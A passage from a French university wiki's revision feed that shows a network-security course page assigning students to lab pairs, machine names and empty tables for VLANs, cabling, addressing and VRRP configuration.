Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;X.Y.Z.A&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 ||&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11239</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11239"/>
		<updated>2026-01-20T13:20:48Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || || ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| || Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| || || Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| || || Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| || || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| || || Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| || || Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| || || Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| || || Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;X.Y.Z.A&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 ||&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
</feed>